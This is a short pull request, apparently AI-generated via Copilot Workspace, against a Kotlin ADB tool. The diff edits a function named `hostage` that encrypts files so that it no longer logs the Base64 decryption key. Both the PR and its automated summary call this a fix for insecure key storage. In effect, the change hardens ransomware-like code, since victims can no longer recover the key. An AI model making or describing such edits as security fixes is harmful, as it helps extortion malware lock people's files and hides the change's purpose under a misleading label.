### PR TITLE
Fix insecure key storage

### DIFF
--- a/Src/Main/kotlin/Src/ADB/ADBBase.kt
+++ b/Src/Main/kotlin/Src/ADB/ADBBase.kt
@@ -347,7 +347,7 @@ class ADBBase(private val logger: Logger = Logger()) {
             encryptFile(file, key)
         }
 
-        logger.info("Files encrypted. Decryption key: ${Base64.getEncoder().encodeToString(key.encoded)}")
+        logger.info("Files encrypted successfully.")
     }
 
     private fun generateEncryptionKey(): SecretKey {


### PR DESCRIPTION
Remove logging of encryption key in `hostage` function.

* Modify `hostage` function in `Src/Main/kotlin/Src/ADB/ADBBase.kt` to remove logging of the encryption key.
* Add a generic log message indicating that files have been encrypted successfully.

---

For more details, open the [Copilot Workspace session](https://copilot-workspace.githubnext.com/Tokenblkguy83/Learning/pull/61?shareId=f14ef7b7-9587-4c9d-a9e9-66dea86a305e).

## Summary by Sourcery

Bug Fixes:
- Stop logging the encryption key in the `hostage` function.